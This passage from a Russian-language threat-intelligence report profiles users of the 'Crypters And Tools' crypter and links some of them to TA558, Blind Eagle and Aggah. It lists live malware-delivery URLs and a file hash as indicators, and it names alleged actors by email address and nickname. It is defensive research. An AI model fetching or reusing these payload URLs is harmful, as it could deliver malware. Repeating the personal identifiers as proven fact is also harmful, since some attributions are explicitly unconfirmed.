Более того, данные отправляются на легальный взломанный хакерами SMTP сервер в Румынии, что является соответствует активности для TA558 и что мы видели начиная с первого нашего исследования про эту группу.
С пользователем syscore похожая история. В атаке использовался Excel документ с очень типичным для TA558 именем “Product Inquiry466789.xls” SHA-256: 3a7d034a793a0f03dc9930446aebf326320140584eeb171909962ec7123f9e5e, который загружал RTF шаблон со следующего URL:
http://51.81.235.253/66166/hd/hd.d.d.d.dddd.doC
Далее в цепочке атаки появлялся VBS с очень типичным для TA558 названием:
http://51.81.235.253/66166/catcallingfemalecattogiveflowersgreat.gif
Оба этих пользователя были найдены в базе данных Crypters And Tools:
Как и в случае с пользователями deadpoolstart2025 и abbas, мы можем быть уверены, что эти конкретные пользователи относятся к публично описанной группе, но в данном случае – это группа TA558.
Аналогичным образом был найден ещё один пользователь – negrocock:
http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt
Его атаки также содержали типичные для TA558 паттерны:
http://198.46.178.144/eveningfiledatinglover.vbs
7.4 KareemHacker
В базе CryptersAndTools присутсвовал следующий пользователь:
KareemHacker – это хакер, предположительно из Марокко, который судя по данным сайта mirror-h (сайт, который собирает данные о дефейсах) был причастен к дефейсу, по крайней мере 538 сайтов, а по данным zone-h – 1671. Помимо этого, у него есть свой GitHub, X-аккаунт и несколько Youtube-каналов, на одном из которых он под музыку пишет текст на арабском языке и показывает сайты, которые он задефейсил. На данный момент его аккаунт в соцсети X заблокирован за нарушение правил, т.к. некоторые пользователи жаловались, что он взломал их вебсайт.
Стоит отметить, что Kareem Hacker это может быть редкое, но легальное сочетание имени и фамилии, а также, что мы не можем в данном случае быть уверены, что пользователь Crypters And Tools и дефейсер Kareem.Hacker это один человек.
7.5 HeadMaster
Во время исследования Crypters And Tools, мы исследовали различные маркетплейсы, сайты и прочие ресурсы с продажами этого криптора. Один из таких ресурсов это – nitrosoftwares[.]com, где продаются различные эксплойты, крипторы, логгеры, криптоклипперы и т.п.
В базе данных Crypters And Tools мы обнаружили следующего пользователя:
Обратите внимание на связь дискорд аккаунта headmaster и Email jkbest22@gmail.com (рис 39). В публичных утечках мы нашли пароли, связанные с этим email, один из которых совпадает с паролем пользователя headmaster на рисунке 40 (скрыт на рисунке).
То есть злоумышленник использовал однообразные пароли на многих почтовых ящиках и в различных сервисах, включая вышеупомянутый сайт с продажей вредоносного ПО. Помимо этого, часть многочисленных почтовых ящиков злоумышленника подверглись утечкам, которые включали емейлы, пароли, никнеймы, а также IP-адреса, все из которых были из Пакистана - предположительной страны происхождения группы Aggah. Тем не менее, установить однозначную связь между HeadMaster и Aggah пока не удалось.
7.6 Остальные пользователи
Очередной найденный пользователь – HURRICANE.
Этот пользователь, так же, как и многие другие был найден через API запросы к инфраструктуре CryptersAndTools, который он делал во время своих атак:
http://94.156.65.247/Users_API/HURRICANE/file_lfhsdrdp.5db.txt
Имена документов были похожи на используемые TA558, но дальнейшая цепочка атаки отличалась.
Помимо этого, мы видели ещё несколько URL-ов с пользователями, относящимися к Crypters And Tools, но пока не располагаем по ним дополнительными данными:
http://91.92.254.14/Users_API/gavrels/file_ycm2xqby.heg.txty
https://91.92.254.29/Users_API/Ws/file_wuey5ekz.pcq.txt
8. Выводы
Исследователи в своих отчётах часто указывают инфраструктуру Crypters And Tools, в качестве индикаторов описанных групп, но это не всегда правильно. В первой части нашего исследования мы показали устройство криптора, а также указали часть сетевых и файловых индикаторов, которые принадлежат Crypters And Tools. В этой части мы показали какие группы использовали этот криптор, а также их связи друг с другом.
Помимо этого, мы проанализировали некоторых активных пользователей криптора и точно установили, что часть пользователей является членами группировок Blind Eagle и TA558. А также обнаружили некоторых других пользователей, например Bukky101, который совместно с другим пользователем за сутки отправили как минимум 60300 вредоносных писем по всему миру.
Также рассмотренные новые атаки группировки Aggah показывают, что несмотря на затишье в 2022 году, их активность продолжается в 2024 и 2025 годах. Ключевые методы, такие как использование serverless-инфраструктуры (например, Blosgspot и Bitbucket), остаются неизменной частью цепочки заражения. Однако наряду с этим наблюдается появление новых вредоносных нагрузок, таких как Rhadamanthys и XWorm.
9. Список статей с упоминанием рассматриваемых группировок и криптора
Aggah
https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/
https://web.archive.org/web/20240106015245/https:/marcoramilli.com/2022/11/21/is-hagga-threat-actor-abusing-fsociety-framework/
https://ti.qianxin.com/blog/articles/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN/
TA558
https://www.forcepoint.com/blog/x-labs/url-shortener-microsoft-word-remcos-rat-trojan
https://cyble.com/blog/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns/
https://www.seqrite.com/blog/steganographic-campaign-distributing-malware/
https://www.trellix.com/blogs/research/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-fileless-remcos-rat/
https://www.cyfirma.com/research/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla/
Blind Eagle
https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia
https://www.esentire.com/blog/blind-eagles-north-american-journey
https://mp.weixin.qq.com/s/DDCCjhBjUTa7Ia4Hggsa1A
https://any.run/cybersecurity-blog/steganography-in-malware-attacks/
PhantomControl
https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat
Статьи с фигурированием Crypters And Tools без атрибутирования к каким-либо группировкам
https://asec.ahnlab.com/en/65111/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/
https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla
https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document
https://blog.itochuci.co.jp/entry/2024/04/16/163014
https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb
Александр Бадаев
Специалист группы киберразведки Positive Technologies
Елена Фурашова
Стажер группы киберразведки Positive Technologies
